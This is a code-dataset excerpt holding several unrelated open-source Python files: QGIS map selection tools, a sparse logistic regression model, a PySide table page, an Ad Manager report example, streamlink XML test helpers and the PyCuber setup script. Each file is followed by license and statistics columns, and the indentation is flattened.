# disconnect if it was already connected, so slot gets called only once!
except:
pass
if isChecked:
self.canvas.setMapTool(self.tool)
self.tool.gapSelected.connect(self.gapFound)
else:
self.canvas.unsetMapTool(self.tool)
def gapFound(self, selectGapResult):
raise NotImplementedError("Should have implemented gapFound")
class DtMapToolEdit(QgsMapToolEdit, DtTool):
'''abstract subclass of QgsMapToolEdit'''
def __init__(self, iface, **kw):
super().__init__(canvas = iface.mapCanvas(), iface = iface, geometryTypes = [])
def activate(self):
self.canvas.setCursor(self.cursor)
def deactivate(self):
self.reset()
def reset(self, emitSignal = False):
pass
def transformed(self, thisLayer, thisQgsPoint):
layerCRSSrsid = thisLayer.crs().srsid()
projectCRSSrsid = QgsProject.instance().crs().srsid()
if layerCRSSrsid != projectCRSSrsid:
transQgsPoint = QgsGeometry.fromPointXY(thisQgsPoint)
transQgsPoint.transform(QgsCoordinateTransform(
QgsProject.instance().crs(), thisLayer.crs(),
QgsProject.instance()))
return transQgsPoint.asPoint()
else:
return thisQgsPoint
class DtSelectFeatureTool(DtMapToolEdit):
featureSelected = QtCore.pyqtSignal(list)
def __init__(self, iface):
super().__init__(iface)
self.currentHighlight = [None, None] # feature, highlightGraphic
        self.ignoreFids = []  # feature ids that should be ignored when looking for a feature
def highlightFeature(self, layer, feature):
'''highlight the feature if it has a geometry'''
geomType = layer.geometryType()
returnGeom = None
if geomType <= 2:
if geomType == 0:
marker = QgsVertexMarker(self.iface.mapCanvas())
marker.setIconType(3) # ICON_BOX
marker.setColor(self.rubberBandColor)
marker.setIconSize(12)
marker.setPenWidth (3)
marker.setCenter(feature.geometry().centroid().asPoint())
returnGeom = marker
else:
settings = QtCore.QSettings()
settings.beginGroup("Qgis/digitizing")
a = settings.value("line_color_alpha",200,type=int)
b = settings.value("line_color_blue",0,type=int)
g = settings.value("line_color_green",0,type=int)
r = settings.value("line_color_red",255,type=int)
lw = settings.value("line_width",1,type=int)
settings.endGroup()
rubberBandColor = QtGui.QColor(r, g, b, a)
rubberBandWidth = lw
rubberBand = QgsRubberBand(self.iface.mapCanvas())
rubberBand.setColor(rubberBandColor)
rubberBand.setWidth(rubberBandWidth)
rubberBand.setToGeometry(feature.geometry(), layer)
returnGeom = rubberBand
self.currentHighlight = [feature, returnGeom]
return returnGeom
else:
return None
def removeHighlight(self):
highlightGeom = self.currentHighlight[1]
if highlightGeom != None:
self.iface.mapCanvas().scene().removeItem(highlightGeom)
self.currentHighlight = [None, None]
def highlightNext(self, layer, startingPoint):
if self.currentHighlight != [None, None]:
self.ignoreFids.append(self.currentHighlight[0].id())
        # getFeatureForPoint returns the first feature found; if there is only one, it returns that feature
found = self.getFeatureForPoint(layer, startingPoint)
if len(found) == 0:
self.removeHighlight()
return 0
else:
aFeat = found[0]
numFeatures = found[1]
if self.currentHighlight != [None, None]:
if aFeat.id() != self.currentHighlight[0].id():
self.removeHighlight()
self.highlightFeature(layer, found[0])
else:
self.highlightFeature(layer, found[0])
return numFeatures
def getFeatureForPoint(self, layer, startingPoint, inRing = False):
'''
return the feature this QPoint is in (polygon layer)
or this QPoint snaps to (point or line layer)
'''
result = []
if self.isPolygonLayer(layer):
mapToPixel = self.canvas.getCoordinateTransform()
#thisQgsPoint = mapToPixel.toMapCoordinates(startingPoint)
thisQgsPoint = self.transformed(layer, mapToPixel.toMapCoordinates(startingPoint))
spatialIndex = dtutils.dtSpatialindex(layer)
featureIds = spatialIndex.nearestNeighbor(thisQgsPoint, 0)
# if we use 0 as neighborCount then only features that contain the point
# are included
for fid in featureIds:
feat = dtutils.dtGetFeatureForId(layer, fid)
if feat != None:
geom = QgsGeometry(feat.geometry())
if geom.contains(thisQgsPoint):
                        result.append(feat)
                        result.append([])
                        return result
else:
if inRing:
rings = dtutils.dtExtractRings(geom)
if len(rings) > 0:
for aRing in rings:
if aRing.contains(thisQgsPoint):
                                        result.append(feat)
                                        result.append([])
                                        result.append(aRing)
                                        return result
else:
#we need a snapper, so we use the MapCanvas snapper
snapper = self.canvas.snappingUtils()
snapper.setCurrentLayer(layer)
            # snapType = 0: no snap, 1 = vertex, 2 = segment, 3 = vertex & segment
snapMatch = snapper.snapToCurrentLayer(startingPoint, QgsPointLocator.All)
if not snapMatch.isValid():
dtutils.showSnapSettingsWarning(self.iface)
else:
feat = dtutils.dtGetFeatureForId(layer, snapMatch.featureId())
if feat != None:
result.append(feat)
if snapMatch.hasVertex():
result.append([snapMatch.point(), None])
if snapMatch.hasEdge():
result.append(snapMatch.edgePoints())
return result
return result
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
found = self.getFeatureForPoint(layer, startingPoint)
if len(found) > 0:
feat = found[0]
layer.removeSelection()
layer.select(feat.id())
self.featureSelected.emit([feat.id()])
class DtSelectPolygonTool(DtSelectFeatureTool):
def __init__(self, iface):
super().__init__(iface)
def getFeatureForPoint(self, layer, startingPoint):
'''
return the feature this QPoint is in and the total amount of features
'''
result = []
mapToPixel = self.canvas.getCoordinateTransform()
#thisQgsPoint = mapToPixel.toMapCoordinates(startingPoint)
thisQgsPoint = self.transformed(layer, mapToPixel.toMapCoordinates(startingPoint))
spatialIndex = dtutils.dtSpatialindex(layer)
featureIds = spatialIndex.nearestNeighbor(thisQgsPoint, 0)
# if we use 0 as neighborCount then only features that contain the point
# are included
foundFeatures = []
while True:
for fid in featureIds:
if self.ignoreFids.count(fid) == 0:
feat = dtutils.dtGetFeatureForId(layer, fid)
if feat != None:
geom = QgsGeometry(feat.geometry())
if geom.contains(thisQgsPoint):
foundFeatures.append(feat)
if len(foundFeatures) == 0:
                if len(self.ignoreFids) == 0:  # there is no feature at this point
break #while
else:
self.ignoreFids.pop(0) # remove first and try again
elif len(foundFeatures) > 0: # return first feature
feat = foundFeatures[0]
result.append(feat)
result.append(len(featureIds))
break #while
return result
def canvasReleaseEvent(self,event):
'''
- if user clicks left and no feature is highlighted, highlight first feature
- if user clicks left and there is a highlighted feature use this feature as selected
- if user clicks right, highlight another feature
'''
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
startingPoint = QtCore.QPoint(x,y)
#the clicked point is our starting point
if event.button() == QtCore.Qt.RightButton: # choose another feature
self.highlightNext(layer, startingPoint)
elif event.button() == QtCore.Qt.LeftButton:
if self.currentHighlight == [None, None]: # first click
numFeatures = self.highlightNext(layer, startingPoint)
else: # user accepts highlighted geometry
mapToPixel = self.canvas.getCoordinateTransform()
thisQgsPoint = self.transformed(layer, mapToPixel.toMapCoordinates(startingPoint))
feat = self.currentHighlight[0]
if feat.geometry().contains(thisQgsPoint): # is point in highlighted feature?
numFeatures = 1
                    else:  # maybe the user clicked somewhere else
numFeatures = self.highlightNext(layer, startingPoint)
if numFeatures == 1:
feat = self.currentHighlight[0]
self.removeHighlight()
layer.removeSelection()
layer.select(feat.id())
self.featureSelected.emit([feat.id()])
def reset(self):
self.removeHighlight()
class DtSelectRingTool(DtSelectFeatureTool):
'''
a map tool to select a ring in a polygon
'''
ringSelected = QtCore.pyqtSignal(list)
def __init__(self, iface):
super().__init__(iface)
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
found = self.getFeatureForPoint(layer, startingPoint, inRing = True)
if len(found) == 3:
aRing = found[2]
self.ringSelected.emit([aRing])
def reset(self, emitSignal = False):
pass
class DtSelectGapTool(DtMapToolEdit):
'''
a map tool to select a gap between polygons, if allLayers
is True then the gap is searched between polygons of
all currently visible polygon layers
'''
gapSelected = QtCore.pyqtSignal(list)
def __init__(self, iface, allLayers):
super().__init__(iface)
self.allLayers = allLayers
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
visibleLayers = []
if self.allLayers:
for aLayer in self.iface.layerTreeCanvasBridge().rootGroup().checkedLayers():
                if aLayer.type() == QgsMapLayer.VectorLayer:
if self.isPolygonLayer(aLayer):
visibleLayers.append(aLayer)
else:
if layer != None:
visibleLayers.append(layer)
if len(visibleLayers) > 0:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
mapToPixel = self.canvas.getCoordinateTransform()
thisQgsPoint = self.transformed(layer, mapToPixel.toMapCoordinates(startingPoint))
multiGeom = None
for aLayer in visibleLayers:
if not self.allLayers and aLayer.selectedFeatureCount() > 0:
                    # we assume that the gap is between the selected polygons
hadSelection = True
else:
hadSelection = False
spatialIndex = dtutils.dtSpatialindex(aLayer)
# get the 100 closest Features
featureIds = spatialIndex.nearestNeighbor(thisQgsPoint, 100)
aLayer.select(featureIds)
multiGeom = dtutils.dtCombineSelectedPolygons(aLayer, self.iface, multiGeom)
if self.allLayers or not hadSelection:
aLayer.removeSelection()
if multiGeom == None:
return None
if multiGeom != None:
rings = dtutils.dtExtractRings(multiGeom)
if len(rings) > 0:
for aRing in rings:
if aRing.contains(thisQgsPoint):
self.gapSelected.emit([aRing])
break
def reset(self, emitSignal = False):
pass
class DtSelectPartTool(DtSelectFeatureTool):
    '''signal sends featureId of clicked feature, number of selected part and geometry of part'''
partSelected = QtCore.pyqtSignal(list)
def __init__(self, iface):
super().__init__(iface)
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
found = self.getFeatureForPoint(layer, startingPoint)
if len(found) > 0:
feat = found[0]
snappedPoints = found[1]
if len(snappedPoints) > 0:
snappedVertex = snappedPoints[0]
else:
snappedVertex = None
geom = QgsGeometry(feat.geometry())
# if feature geometry is multipart start split processing
if geom.isMultipart():
# Get parts from original feature
parts = geom.asGeometryCollection()
mapToPixel = self.canvas.getCoordinateTransform()
thisQgsPoint = mapToPixel.toMapCoordinates(startingPoint)
for i in range(len(parts)):
# find the part that was snapped
aPart = parts[i]
if self.isPolygonLayer(layer):
if aPart.contains(thisQgsPoint):
self.partSelected.emit([feat.id(), i, aPart])
break
else:
points = dtutils.dtExtractPoints(aPart)
for j in range(len(points)):
aPoint = points[j]
if snappedVertex != None:
if aPoint.x() == snappedVertex.x() and \
aPoint.y() == snappedVertex.y():
self.partSelected.emit([feat.id(), i, aPart])
break
else:
try:
nextPoint = points[j + 1]
except:
break
if aPoint.x() == snappedPoints[0].x() and \
aPoint.y() == snappedPoints[0].y() and \
nextPoint.x() == snappedPoints[1].x() and \
nextPoint.y() == snappedPoints[1].y():
self.partSelected.emit([feat.id(), i, aPart])
break
class DtSelectVertexTool(DtMapToolEdit):
'''select and mark numVertices vertices in the active layer'''
vertexFound = QtCore.pyqtSignal(list)
def __init__(self, iface, numVertices = 1):
super().__init__(iface)
# desired number of marked vertex until signal
self.numVertices = numVertices
# number of marked vertex
self.count = 0
# arrays to hold markers and vertex points
self.markers = []
self.points = []
self.fids = []
def canvasReleaseEvent(self,event):
if self.count < self.numVertices: #not yet enough
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
#we need a snapper, so we use the MapCanvas snapper
snapper = self.canvas.snappingUtils()
snapper.setCurrentLayer(layer)
# snapType = 0: no snap, 1 = vertex, 2 = segment, 3 = vertex & segment
snapMatch = snapper.snapToCurrentLayer(startingPoint, QgsPointLocator.Vertex)
if not snapMatch.isValid():
#warn about missing snapping tolerance if appropriate
dtutils.showSnapSettingsWarning(self.iface)
else:
#mark the vertex
p = snapMatch.point()
m = QgsVertexMarker(self.canvas)
m.setIconType(1)
if self.count == 0:
m.setColor(QtGui.QColor(255,0,0))
else:
m.setColor(QtGui.QColor(0, 0, 255))
m.setIconSize(12)
m.setPenWidth (3)
m.setCenter(p)
self.points.append(p)
self.markers.append(m)
fid = snapMatch.featureId() # QgsFeatureId of the snapped geometry
self.fids.append(fid)
self.count += 1
if self.count == self.numVertices:
self.vertexFound.emit([self.points, self.markers, self.fids])
#self.emit(SIGNAL("vertexFound(PyQt_PyObject)"), [self.points, self.markers])
def reset(self, emitSignal = False):
for m in self.markers:
self.canvas.scene().removeItem(m)
self.markers = []
self.points = []
self.fids = []
self.count = 0
class DtSelectSegmentTool(DtMapToolEdit):
segmentFound = QtCore.pyqtSignal(list)
def __init__(self, iface):
super().__init__(iface)
self.rb1 = QgsRubberBand(self.canvas, False)
def canvasReleaseEvent(self,event):
#Get the click
x = event.pos().x()
y = event.pos().y()
layer = self.canvas.currentLayer()
if layer != None:
#the clicked point is our starting point
startingPoint = QtCore.QPoint(x,y)
#we need a snapper, so we use the MapCanvas snapper
snapper = self.canvas.snappingUtils()
snapper.setCurrentLayer(layer)
# snapType = 0: no snap, 1 = vertex, 2 = segment, 3 = vertex & segment
snapType = 2
snapMatch = snapper.snapToCurrentLayer(startingPoint, QgsPointLocator.Edge)
if not snapMatch.isValid():
#warn about missing snapping tolerance if appropriate
dtutils.showSnapSettingsWarning(self.iface)
else:
                # we have found a line segment
                edge = snapMatch.edgePoints()
                p1 = edge[0]
                p2 = edge[1]
                # we want to mark the chosen segment, so we need a rubber band
self.rb1.reset()
color = QtGui.QColor(255,0,0)
self.rb1.setColor(color)
self.rb1.setWidth(2)
self.rb1.addPoint(p1)
self.rb1.addPoint(p2)
self.rb1.show()
self.segmentFound.emit([self.rb1.getPoint(0, 0), self.rb1.getPoint(0, 1), self.rb1])
def reset(self, emitSignal = False):
self.rb1.reset()
class DtSplitFeatureTool(QgsMapToolAdvancedDigitizing, DtTool):
finishedDigitizing = QtCore.pyqtSignal(QgsGeometry)
def __init__(self, iface):
super().__init__(canvas = iface.mapCanvas(), cadDockWidget = iface.cadDockWidget(),
iface = iface, geometryTypes = [])
self.marker = None
self.rubberBand = None
self.sketchRubberBand = self.createRubberBand()
self.sketchRubberBand.setLineStyle(QtCore.Qt.DotLine)
self.rbPoints = [] # array to store points in rubber band because
# api to access points does not work properly or I did not figure it out :)
self.currentMousePosition = None
self.snapPoint = None
self.reset()
def activate(self):
super().activate()
self.canvas.setCursor(self.cursor)
self.canvas.installEventFilter(self)
self.snapPoint = None
self.rbPoints = []
def eventFilter(self, source, event):
'''
        we need an eventFilter here to filter out Backspace key presses,
        as otherwise the selected objects in the edit layer get deleted
        when the user hits Backspace.
        The eventFilter() function must return true if the event should be
        filtered (i.e. stopped); otherwise it must return false, see
http://doc.qt.io/qt-5/qobject.html#installEventFilter
'''
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Backspace:
if self.rubberBand != None:
if self.rubberBand.numberOfVertices() >= 2: # QgsRubberBand has always 2 vertices
if self.currentMousePosition != None:
self.removeLastPoint()
self.redrawSketchRubberBand([self.toMapCoordinates(self.currentMousePosition)])
return True
else:
return False
else:
return False
def eventToQPoint(self, event):
x = event.pos().x()
y = event.pos().y()
thisPoint = QtCore.QPoint(x, y)
return thisPoint
def initRubberBand(self, firstPoint):
if self.rubberBand == None:
# create a QgsRubberBand
self.rubberBand = self.createRubberBand()
self.rubberBand.addPoint(firstPoint)
self.rbPoints.append(firstPoint)
def removeLastPoint(self):
''' remove the last point in self.rubberBand'''
if len (self.rbPoints) > 1: #first point will not be removed
self.rbPoints.pop()
            # we recreate the rubberBand because it contains duplicate points
self.rubberBand.reset()
for aPoint in self.rbPoints:
self.rubberBand.addPoint(QgsPointXY(aPoint))
def trySnap(self, event):
self.removeSnapMarker()
self.snapPoint = None
# try to snap
thisPoint = self.eventToQPoint(event)
snapper = self.canvas.snappingUtils()
# snap to any layer within snap tolerance
snapMatch = snapper.snapToMap(thisPoint)
if not snapMatch.isValid():
return False
else:
self.snapPoint = snapMatch.point()
self.markSnap(self.snapPoint)
return True
def markSnap(self, thisPoint):
self.marker = QgsVertexMarker(self.canvas)
self.marker.setIconType(1)
self.marker.setColor(QtGui.QColor(255,0,0))
self.marker.setIconSize(12)
self.marker.setPenWidth (3)
self.marker.setCenter(thisPoint)
def removeSnapMarker(self):
if self.marker != None:
self.canvas.scene().removeItem(self.marker)
self.marker = None
def clear(self):
if self.rubberBand != None:
self.rubberBand.reset()
self.canvas.scene().removeItem(self.rubberBand)
self.rubberBand = None
if self.snapPoint != None:
self.removeSnapMarker()
self.snapPoint = None
self.sketchRubberBand.reset()
self.rbPoints = []
def reset(self):
self.clear()
self.canvas.removeEventFilter(self)
def redrawSketchRubberBand(self, points):
if self.rubberBand != None and len(self.rbPoints) > 0:
self.sketchRubberBand.reset()
sketchStartPoint = self.rbPoints[len(self.rbPoints) -1]
self.sketchRubberBand.addPoint(QgsPointXY(sketchStartPoint))
if len(points) == 1:
self.sketchRubberBand.addPoint(QgsPointXY(sketchStartPoint))
self.sketchRubberBand.movePoint(
self.sketchRubberBand.numberOfVertices() -1, points[0])
#for p in range(self.rubberBand.size()):
# self.debug("Part " + str(p))
# for v in range(self.rubberBand.partSize(p)):
# vertex = self.rubberBand.getPoint(0,j=v)
# self.debug("Vertex " + str(v) + " = "+ str(vertex.x()) + ", " + str(vertex.y()))
#startPoint = self.rubberBand.getPoint(0, self.rubberBand.partSize(0) -1)
#self.debug("StartPoint " + str(startPoint))
#self.sketchRubberBand.addPoint(startPoint)
#self.sketchRubberBand.addPoint(points[len(points) - 1])
else:
for aPoint in points:
self.sketchRubberBand.addPoint(aPoint)
def cadCanvasMoveEvent(self, event):
pass
#self.debug("cadCanvasMoveEvent")
def cadCanvasPressEvent(self, event):
pass
#self.debug("cadCanvasPressEvent")
def cadCanvasReleaseEvent(self, event):
pass
#self.debug("cadCanvasReleaseEvent")
def canvasMoveEvent(self, event):
self.snapPoint = None
thisPoint = self.eventToQPoint(event)
hasSnap = self.trySnap(event)
if self.rubberBand != None:
if hasSnap:
#if self.canvas.snappingUtils().config().enabled(): # is snapping active?
tracer = QgsMapCanvasTracer.tracerForCanvas(self.canvas)
if tracer.actionEnableTracing().isChecked(): # tracing is pressed in
tracer.configure()
#startPoint = self.rubberBand.getPoint(0, self.rubberBand.numberOfVertices() -1)
startPoint = self.rbPoints[len(self.rbPoints) -1]
pathPoints, pathError = tracer.findShortestPath(QgsPointXY(startPoint), self.snapPoint)
if pathError == 0: #ErrNone
                        pathPoints.pop(0)  # remove first point as it is identical to startPoint
self.redrawSketchRubberBand(pathPoints)
else:
self.redrawSketchRubberBand([self.snapPoint])
else:
self.redrawSketchRubberBand([self.snapPoint])
else:
self.redrawSketchRubberBand([self.toMapCoordinates(thisPoint)])
self.currentMousePosition = thisPoint
def canvasReleaseEvent(self, event):
layer = self.canvas.currentLayer()
if layer != None:
thisPoint = self.eventToQPoint(event)
#QgsMapToPixel instance
if event.button() == QtCore.Qt.LeftButton:
if self.rubberBand == None:
if self.snapPoint == None:
self.initRubberBand(self.toMapCoordinates(thisPoint))
else: # last mouse move created a snap
self.initRubberBand(self.snapPoint)
self.snapPoint = None
self.removeSnapMarker()
else: # merge sketchRubberBand into rubberBand
sketchGeom = self.sketchRubberBand.asGeometry()
verticesSketchGeom = sketchGeom.vertices()
self.rubberBand.addGeometry(sketchGeom)
# rubberBand now contains a double point because its former end point
# and sketchRubberBand's start point are identical,
# so we remove the last point before adding new ones
self.rbPoints.pop()
while verticesSketchGeom.hasNext():
# add the new points
self.rbPoints.append(verticesSketchGeom.next())
self.redrawSketchRubberBand([self.toMapCoordinates(thisPoint)])
if self.snapPoint != None:
self.snapPoint = None
self.removeSnapMarker()
else: # right click
if self.rubberBand != None and self.rubberBand.numberOfVertices() > 1:
rbGeom = self.rubberBand.asGeometry()
self.finishedDigitizing.emit(rbGeom)
self.clear()
self.canvas.refresh()
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Escape:
self.clear()
def deactivate(self):
self.reset()
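# --- Illustrative sketch (added for clarity; not part of the original source) ---
# One plausible way to activate a digitizing tool like this from a QGIS plugin.
# "SketchMapTool" is a hypothetical stand-in for this class's actual name, and
# `iface` is the usual QGIS plugin interface object.
#
# canvas = iface.mapCanvas()
# tool = SketchMapTool(canvas)
# tool.finishedDigitizing.connect(lambda geom: print(geom.asWkt()))
# canvas.setMapTool(tool)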
|
gpl-2.0
| -5,751,604,370,468,592,000
| 38.091052
| 146
| 0.555741
| false
| 4.384751
| false
| false
| false
|
HazyResearch/metal
|
metal/contrib/baselines/sparse_logreg.py
|
1
|
1109
|
from metal.contrib.modules.sparse_linear_module import SparseLinearModule
from metal.end_model import EndModel
from metal.utils import recursive_merge_dicts
class SparseLogisticRegression(EndModel):
"""A _sparse_ logistic regression classifier for a single-task problem
Args:
input_dim: The maximum length of each input (a tensor of integer
indices corresponding to one-hot features)
output_dim: The cardinality of the classifier
padding_idx: If not None, the embedding at this index is initialized to
0 so no gradient will pass through it.
"""
def __init__(self, input_dim, output_dim=2, padding_idx=0, **kwargs):
layer_out_dims = [input_dim, output_dim]
sparse_linear = SparseLinearModule(
vocab_size=input_dim, embed_size=output_dim, padding_idx=padding_idx
)
overrides = {"input_batchnorm": False, "input_dropout": 0.0}
kwargs = recursive_merge_dicts(
kwargs, overrides, misses="insert", verbose=False
)
super().__init__(layer_out_dims, head_module=sparse_linear, **kwargs)
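# --- Illustrative sketch (added for clarity; not part of the original source) ---
# A minimal way this classifier might be used, assuming inputs are padded
# tensors of integer feature indices into a vocabulary of size 1000 and a
# binary label space; the training and scoring calls mirror the generic
# EndModel API and the data splits here are hypothetical.
#
# model = SparseLogisticRegression(input_dim=1000, output_dim=2)
# model.train_model((X_train, Y_train), valid_data=(X_dev, Y_dev))
# score = model.score((X_test, Y_test))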
|
apache-2.0
| -7,200,890,425,346,443,000
| 41.653846
| 80
| 0.672678
| false
| 4.062271
| false
| false
| false
|
katerina7479/kadre
|
view/pages/tableboxpage.py
|
1
|
3165
|
from PySide import QtGui
from pages import Page
from view.widgets.buttonvbox import ButtonVBox
from view.widgets.tablebox import TableBox
class TableBoxPage(Page):
def __init__(self, parent, name):
super(TableBoxPage, self).__init__(parent, name)
def _setup(self):
self.headerlabeltext = "This is my TableBoxPage"
self.ctext = "Subheader 1"
self.ptext = "Subheader 2"
self.buttonlist = [
{"type": "button", "text": "Add",
"callback": self.on_add},
{"type": "button", "text": "Edit",
"callback": self.on_edit},
{"type": "button", "text": "Delete",
"callback": self.on_del}]
# Usually get datalist from the database
self.datalist = [{"id": 1, "name": "TestName", "desc": "TestDesc", "date": "02MAR13"}]
self.collist = [{"column": "name", "title": "Name"},
{"column": "desc", "title": "Description"},
{"column": "date", "title": "Date"}
]
def _header(self):
self.hlabel = QtGui.QLabel(
"<font size=16 align='center'>%s</font>" % self.headerlabeltext)
hbox = QtGui.QHBoxLayout()
hbox.addStretch(1)
hbox.addWidget(self.hlabel)
hbox.addStretch(1)
self.dashcheck = QtGui.QCheckBox()
self.dashcheck.setChecked(True)
self.dashcheck.stateChanged.connect(self.on_dash)
hbox.addWidget(self.dashcheck)
hbox.addWidget(QtGui.QLabel("My Check Box"))
self.layout.addLayout(hbox)
self.clabel = QtGui.QLabel(self.ctext)
self.plabel = QtGui.QLabel(self.ptext)
hbox2 = QtGui.QHBoxLayout()
hbox2.addStretch(1)
hbox2.addWidget(self.clabel)
hbox2.addStretch(1)
hbox2.addWidget(self.plabel)
hbox2.addStretch(1)
self.layout.addLayout(hbox2)
self.layout.addStretch(1)
def _center(self):
self.layout.addWidget(QtGui.QLabel("TableBox: "))
hbox = QtGui.QHBoxLayout()
vbox = ButtonVBox(self.buttonlist)
hbox.addLayout(vbox)
self.tablebox = TableBox(self.datalist, self.collist, self.on_edit)
hbox.addWidget(self.tablebox)
self.layout.addLayout(hbox)
self.layout.addStretch(1)
def _refreshbox(self):
#self.datalist = from the database
#self.tablebox.Update(self.datalist)
pass
def _footer(self):
self.layout.addStretch(1)
def refresh(self):
self._setup()
self._refreshbox()
self.show()
def on_add(self):
# Do Stuff to add to database, and refresh (like make a dialog popup)
self._refreshbox()
def on_edit(self):
myid = self.tablebox.Get()
print myid # Dialog for editing
self._refreshbox()
def on_del(self):
myid = self.tablebox.Get()
print "Deleting %s" % myid # Delete from database
# self.tablebox.DeleteCurrent()
self._refreshbox()
def on_dash(self):
self.dashboard = self.dashcheck.isChecked()
print self.dashboard
|
mit
| 9,157,603,631,712,562,000
| 29.432692
| 94
| 0.578831
| false
| 3.732311
| false
| false
| false
|
googleads/googleads-python-lib
|
examples/ad_manager/v202105/report_service/run_ad_exchange_report.py
|
1
|
2145
|
#!/usr/bin/env python
#
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs a report on Ad Exchange data via the Ad Manager API."""
import tempfile
# Import appropriate modules from the client library.
from googleads import ad_manager
from googleads import errors
def main(client):
# Initialize a DataDownloader.
report_downloader = client.GetDataDownloader(version='v202105')
# Create report job.
report_job = {
'reportQuery': {
'dimensions': ['AD_EXCHANGE_DATE', 'AD_EXCHANGE_COUNTRY_NAME'],
'columns': ['AD_EXCHANGE_AD_REQUESTS', 'AD_EXCHANGE_IMPRESSIONS',
'AD_EXCHANGE_ESTIMATED_REVENUE'],
'dateRangeType': 'LAST_WEEK',
'timeZoneType': 'AD_EXCHANGE', # Run in pacific time
'adxReportCurrency': 'EUR'
}
}
try:
# Run the report and wait for it to finish.
report_job_id = report_downloader.WaitForReport(report_job)
except errors.AdManagerReportError as e:
print('Failed to generate report. Error was: %s' % e)
# Bail out: report_job_id is undefined if the report failed.
return
# Change to your preferred export format.
export_format = 'CSV_DUMP'
report_file = tempfile.NamedTemporaryFile(suffix='.csv.gz', delete=False)
# Download report data.
report_downloader.DownloadReportToFile(
report_job_id, export_format, report_file)
report_file.close()
# Display results.
print('Report job with id "%s" downloaded to:\n%s' % (
report_job_id, report_file.name))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
|
apache-2.0
| 3,438,026,921,193,039,000
| 31.5
| 75
| 0.697902
| false
| 3.756567
| false
| false
| false
|
javiercantero/streamlink
|
tests/resources/__init__.py
|
1
|
1277
|
import codecs
import os.path
import six
from io import BytesIO
try:
import xml.etree.cElementTree as ET
except ImportError: # pragma: no cover
import xml.etree.ElementTree as ET
from contextlib import contextmanager
__here__ = os.path.abspath(os.path.dirname(__file__))
def _parse_xml(data, strip_ns=False):
if six.PY2 and isinstance(data, six.text_type):
data = data.encode("utf8")
elif six.PY3:
data = bytearray(data, "utf8")
try:
it = ET.iterparse(BytesIO(data))
for _, el in it:
if '}' in el.tag and strip_ns:
# strip all namespaces
el.tag = el.tag.split('}', 1)[1]
return it.root
except Exception as err:
snippet = repr(data)
if len(snippet) > 35:
snippet = snippet[:35] + " ..."
raise ValueError("Unable to parse XML: {0} ({1})".format(err, snippet))
@contextmanager
def text(path, encoding="utf8"):
with codecs.open(os.path.join(__here__, path), 'r', encoding=encoding) as resource_fh:
yield resource_fh
@contextmanager
def xml(path, encoding="utf8"):
with codecs.open(os.path.join(__here__, path), 'r', encoding=encoding) as resource_fh:
yield _parse_xml(resource_fh.read(), strip_ns=True)
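# --- Illustrative sketch (added for clarity; not part of the original source) ---
# How a test might consume these helpers, assuming a resource file named
# "example.xml" with a <playlist> root sits next to this module:
#
# with xml("example.xml") as root:
#     assert root.tag == "playlist"
# with text("example.txt") as fh:
#     first_line = fh.readline()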
|
bsd-2-clause
| 8,025,877,989,472,806,000
| 27.377778
| 90
| 0.617071
| false
| 3.557103
| false
| false
| false
|
adrianliaw/PyCuber
|
setup.py
|
1
|
2055
|
from setuptools import setup
import pycuber as pc
long_desc = """
PyCuber
=======
PyCuber is a Rubik's Cube package in Python 2/3.
--------------------------------------------------
The cube can be revealed as expanded view in the terminal, so it's easy
to visualise the cube, just inside the terminal. (Not tested on Windows)
.. code-block:: python
>>> import pycuber as pc
>>> # Create a Cube object
>>> mycube = pc.Cube()
>>> # Do something at the cube.
>>> mycube("R U R' U'")
>>> print(mycube)
.. image:: http://i.imgur.com/OI4kbn7.png
We also provided some useful tools to deal with Rubik's Cube formulae.
.. code-block:: python
>>> import pycuber as pc
>>> # Create a Formula object
>>> my_formula = pc.Formula("R U R' U' R' F R2 U' R' U' R U R' F'")
>>> # Reversing a Formula
>>> my_formula.reverse()
>>> print(my_formula)
>>> # Mirroring a Formula
>>> my_formula.mirror("LR")
>>> print(my_formula)
F R U' R' U R U R2 F' R U R U' R'
F' L' U L U' L' U' L2 F L' U' L' U L
I'll add some documentation later."""
setup(
name = "pycuber",
version = pc.__version__,
description = "Rubik's Cube in Python",
long_description = long_desc,
url = "http://github.com/adrianliaw/PyCuber",
license = "MIT",
author = "Adrian Liaw",
author_email = "adrianliaw2000@gmail.com",
keywords = ["Rubik's Cube", "rubik", "cube", "solver"],
packages = ["pycuber", "pycuber.solver", "pycuber.solver.cfop"],
package_dir = {"pycuber":"pycuber"},
classifiers = [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Mathematics",
],
package_data = {
"pycuber.solver.cfop": ["*.csv"],
},
)
|
mit
| 7,480,977,375,062,680,000
| 25.346154
| 72
| 0.56545
| false
| 3.419301
| false
| true
| false
|
